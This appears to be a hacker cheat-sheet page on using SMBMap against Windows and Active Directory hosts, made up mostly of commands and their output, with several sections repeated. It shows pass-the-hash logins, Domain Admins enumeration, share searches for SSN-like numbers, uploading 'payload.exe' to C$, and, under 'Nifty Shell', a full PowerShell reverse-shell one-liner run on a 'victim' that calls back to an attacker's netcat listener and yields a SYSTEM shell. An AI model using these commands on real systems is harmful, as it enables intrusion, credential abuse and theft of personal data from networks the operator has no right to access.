Curiosidades De Hackers
ACTIVE DIRECTORY

Smbmap


Installation


$ sudo pip3 install smbmap
$ smbmap
smbmap
usage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN]
              [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [-x COMMAND] [--mode CMDMODE]
              [-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check]
              [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH]
              [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE] [--skip]
...
    

Features:

  • Pass-the-Hash Support
  • File upload/download/delete
  • Permission enumeration (writable share, meet Metasploit)
  • Remote Command Execution
  • Distrubted file content searching (beta!)
  • File name matching (with an auto downoad capability)
  • Host file parser supports IPs, host names, and CIDR

Help


usage: smbmap.py [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN] [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE]
                 [-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check] [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH] [--search-timeout TIMEOUT] [--download PATH]
                 [--upload SRC DST] [--delete PATH TO FILE] [--skip]
...
    

Command Execution:


$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'net group "Domain Admins" /domain'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445        Name: unkown
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
abcadmin
The command completed successfully.

Non recursive path listing (ls):


$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$/Users'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 172.16.0.24:445 Name: 172.16.0.24
    Disk                                                    Permissions
    ----                                                    -----------
    C$                                                      READ, WRITE
    .Users
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    .
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    ..
    dr--r--r--                0 Wed Apr 22 14:50:36 2015    Administrator
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    All Users
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Default
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    Default User
    fr--r--r--              174 Thu Apr  9 14:44:01 2015    desktop.ini
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Public
    dr--r--r--                0 Wed Apr 22 13:33:01 2015    wingus

File Content Searching:


$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.0.99...
[+] User SMB session established on 192.168.0.85...
[+] User SMB session established on 192.168.0.89...
[+] File search started on 1 hosts...this could take a while
[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt
[+] File search started on 2 hosts...this could take a while
[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] File search started on 3 hosts...this could take a while
[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 3 completed on 192.168.0.85...
[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] Job 2 of 3 completed on 192.168.0.89...
[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Job 3 of 3 completed on 192.168.0.99...
[+] File successfully deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt
[+] All jobs complete
Host: 192.168.0.85         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found

Host: 192.168.0.89         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm

Host: 192.168.0.99         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found

Filesystem Interaction:


$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --download 'C$/Temp/secret.txt'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445        Name: 192.168.1.100
[+] Downloading file C$/Temp/secret.txt to secret.txt... (101 bytes)
[+] File download successful!

$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --upload 'payload.exe' 'C$/Temp/payload.exe'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445        Name: 192.168.1.100
[+] Uploading file payload.exe to C$/Temp/payload.exe... (10024 bytes)
[+] File upload successful!

$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --delete 'C$/Temp/malicious.exe'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445        Name: 192.168.1.100
[+] Are you sure you want to delete the file C$/Temp/malicious.exe? (y/n): y
[+] Deleting remote file C$/Temp/malicious.exe... (Success)

Examples:


$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10
$ python smbmap.py -u user1,user2,user3 -p 'P@ssw0rd!' -d domain -H 192.168.1.10
$ python smbmap.py --host-file hosts.txt -u username -p 'password' -d domain
$ python smbmap.py --host-file hosts.txt --user-file users.txt --pass-file pass.txt -d domain
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -L
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$/Program Files'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$' -A 'web.config'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$' -g grep_out.txt
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --download 'C$/Temp/important.txt'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --upload 'payload.exe' 'C$/Temp/payload.exe'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --delete 'C$/Temp/malicious.exe'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -F '[Pp]assword'

Additional Examples:


$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

Default Output:


$ ./smbmap.py -H 192.168.12.123 -u administrator -p asdf1234
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.86.39...
[+] IP: 192.168.86.39:445    Name: biffhenderson-pc.lan
    Disk                Permissions    Comment
    ----                -----------    -------
    ADMIN$              READ, WRITE    Remote Admin
    C$                  READ, WRITE    Default share
    IPC$                NO ACCESS    Remote IPC
    Users               READ, WRITE

Command Execution:


$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445    Name: unknown
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
abcadmin
The command completed successfully.

Non-Recursive Path Listing (ls):


$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$/Users'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 172.16.0.24:445    Name: 172.16.0.24
    Disk            Permissions
    ----            -----------
    C$              READ, WRITE
    .Users
    dw--w--w--      0 Wed Apr 29 13:15:25 2015    .
    dw--w--w--      0 Wed Apr 29 13:15:25 2015    ..
    dr--r--r--      0 Wed Apr 22 14:50:36 2015    Administrator
    dr--r--r--      0 Thu Apr  9 14:46:57 2015    All Users
    dw--w--w--      0 Thu Apr  9 14:46:49 2015    Default
    dr--r--r--      0 Thu Apr  9 14:46:57 2015    Default User
    fr--r--r--    174 Thu Apr  9 14:44:01 2015    desktop.ini
    dw--w--w--      0 Thu Apr  9 14:46:49 2015    Public
    dr--r--r--      0 Wed Apr 22 13:33:01 2015    wingus

File Content Searching:


$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.0.99...
[+] User SMB session established on 192.168.0.85...
[+] User SMB session established on 192.168.0.89...
[+] File search started on 1 hosts...this could take a while
[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt
[+] File search started on 2 hosts...this could take a while
[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] File search started on 3 hosts...this could take a while
[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 3 completed on 192.168.0.85...
[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] Job 2 of 3 completed on 192.168.0.89...
[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Job 3 of 3 completed on 192.168.0.99...
[+] File successfully deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt
[+] All jobs complete
Host: 192.168.0.85         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found

Host: 192.168.0.89         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htm

Host: 192.168.0.99         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\biffh\AppData\Local\Microsoft\Internet Explorer\DOMStore\L7W17OPZ\static.olark[1].xml
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\MIY2POGJ\validation[2].js
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Docs[1].htm
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Salesmaps[1].htm

Drive Listing:

This feature was added to complement the file content searching feature


$ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L
[!] Missing domain...defaulting to WORKGROUP
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.24:445    Name: unknown
[+] Host 192.168.1.24 Local Drives: C:\ D:\
[+] Host 192.168.1.24 Net Drive(s):
    E:      \\vboxsrv\Public      VirtualBox Shared Folders

Nifty Shell:

Run Powershell Script on Victim SMB host (change the IP in the code to your IP address, i.e., where the shell connects back to)


$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445    Name: unkown
[!] Error encountered, sharing violation, unable to retrieve output

Attackers Netcat Listener:


$ nc -l 4445
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system